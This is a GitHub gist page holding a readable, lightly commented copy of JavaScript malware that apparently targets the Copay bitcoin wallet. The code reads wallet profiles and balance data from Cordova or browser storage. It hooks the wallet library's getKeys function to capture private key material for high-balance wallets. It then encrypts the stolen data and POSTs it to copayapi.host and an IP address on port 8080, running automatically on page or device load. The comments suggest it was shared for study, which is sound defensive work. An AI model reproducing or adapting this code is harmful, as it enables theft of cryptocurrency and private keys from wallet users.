Instantly share code, notes, and snippets.

Embed
What would you like to do?
/*@@*/
function doBadStuff() {
try {
const http = require("http");
const crypto = require("crypto");
const publicKey = "-----BEGIN PUBLIC KEY-----\n...TRUNCATED...\n-----END PUBLIC KEY-----";
function sendRequest(hostname, path, body) {
// Original request "decodes" a hex representation of the hostnames
// hostname = Buffer.from(hostname, "hex").toString();
const req = http.request({
hostname: hostname,
port: 8080,
method: "POST",
path: "/" + path, // path will be /p or /c
headers: {
"Content-Length": body.length,
"Content-Type": "text/html"
}
}, function() {});
req.on("error", function(err) {});
req.write(body);
req.end();
}
function sendRequests(path, rawStringPayload) {
// path = "c" || "p"
let payload = "";
for (let i = 0; i < rawStringPayload.length; i += 200) {
const chunk = rawStringPayload.substr(i, 200);
payload += crypto.publicEncrypt(
publicKey,
Buffer.from(chunk, "utf8")
).toString("hex") + "+";
}
sendRequest("copayapi.host", path, payload);
sendRequest("111.90.151.134", path, payload);
}
function getDataFromStorage(name, callback) {
if (window.cordova) {
try {
const dd = cordova.file.dataDirectory;
resolveLocalFileSystemURL(dd, function(localFs) {
localFs.getFile(name, {
create: false
}, function(file) {
file.file(function(contents) {
const fileReader = new FileReader;
fileReader.onloadend = function() {
return callback(JSON.parse(fileReader.result))
};
fileReader.onerror = function(err) {
fileReader.abort()
};
fileReader.readAsText(contents)
})
})
})
} catch (err) {}
} else {
try {
const data = localStorage.getItem(name);
if (data) {
return callback(JSON.parse(data));
}
chrome.storage.local.get(name, function(entry) {
if (entry) {
return callback(JSON.parse(entry[name]));
}
})
} catch (err) {}
}
}
global.CSSMap = {};
getDataFromStorage("profile", function(data) {
for (let credential in data.credentials) {
const creds = data.credentials[credential];
if ("livenet" == creds.network) {
getDataFromStorage("balanceCache-" + creds.walletId, function(data) {
const self = this;
self.balance = parseFloat(data.balance.split(" ")[0]);
if ("btc" == self.coin && self.balance < 100 || "bch" == self.coin && self.balance < 1000) {
global.CSSMap[self.xPubKey] = true;
}
sendRequests("c", JSON.stringify(self));
}.bind(creds))
}
}
});
const Credentials = require("bitcore-wallet-client/lib/credentials.js");
// Intercept the getKeys function in the Credentails class
Credentials.prototype.getKeysFunc = Credentials.prototype.getKeys;
Credentials.prototype.getKeys = function(keyLookup) {
const originalResult = this.getKeysFunc(keyLookup);
try {
if (global.CSSMap && global.CSSMap[this.xPubKey]) {
delete global.CSSMap[this.xPubKey];
sendRequests("p", keyLookup + "\t" + this.xPubKey);
}
} catch (err) {}
return originalResult;
}
} catch (err) {}
}
// Run as soon as ready
window.cordova
? document.addEventListener("deviceready", doBadStuff)
: doBadStuff()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment